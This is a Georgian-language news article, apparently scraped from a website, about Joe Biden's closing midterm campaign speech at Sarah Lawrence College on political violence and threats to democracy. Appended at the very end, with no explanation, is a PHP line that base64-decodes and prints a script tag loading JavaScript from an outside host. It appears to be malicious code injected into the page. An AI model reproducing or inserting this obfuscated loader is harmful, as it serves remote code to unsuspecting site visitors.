celsiusi
ავერსი საქკაბელი
აშშ-ის კონგრესის შუალედური არჩევნების კამპანიის დასასრულს, აშშ-ის პრეზიდენტმა ჯო ბაიდენმა ამომრჩევლებთან შეხვედრები გამართა. ჯო ბაიდენმა ნიუ-იორკში არჩევნებს გადამწყვეტი მომენტი უწოდა, რომელიც მომდევო 20 წელს განსაზღვრავს.
 
მედიის ცნობით, ბაიდენმა ამომრჩევლებს სარა ლოურენსის კოლეჯში უთხრა, რომ ისინი არჩევანს აკეთებენ ამერიკის ორ ფუნდამენტურად განსხვავებულ ხედვას შორის.
 
„შეგიძლიათ, წარმოიდგინოთ სხვა დრო სამოქალაქო ომის შემდეგ, როდესაც ვინმემ თქვას მსგავსი რამ, სად მოხდა ეს? სად არის ძალადობა შეწყალებული? შეხედეთ, რა მოხდა პოლ პელოსისთან დაკავშირებით. ნახეთ, რა თქვეს რესპუბლიკელებმა. ზოგი ამას დასცინის ან ამართლებს. ჩემს კარიერაში არასოდეს ყოფილა შემთხვევა, როდესაც ჩვენ განვადიდებდით ძალადობას პოლიტიკურ საფუძველზე. ჩვენ, ყველამ კარგად ვიცით, რომ ჩვენს დემოკრატიას საფრთხე ემუქრება. ბოლო გამოკითხვები ამბობს, რომ ამერიკელების 76 პროცენტი წუხს ჩვენი დემოკრატიის შენარჩუნებაზე და ჩვენ ვიცით, რომ ეს თქვენი თაობის მომენტია, დაიცვათ, შეინარჩუნოთ, აირჩიოთ იგი“, – განაცხადა ბაიდენმა.
 
მედიის ცნობით, გამოკითხვები აჩვენებს, რომ „დემოკრატები“, სავარაუდოდ წარმომადგენელთა პალატაში უმრავლესობას დაკარგავენ. როგორც მედია იუწყება, სენატის კონტროლს სავარაუდოდ პენსილვანიაში, ჯორჯიასა და ნევადაში უკიდურესად დაძაბული რბოლების შედეგები განსაზღვრავს. აშშ-ში კონგრესის არჩევნები 8 ნოემბერს ჩატარდება.
350
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");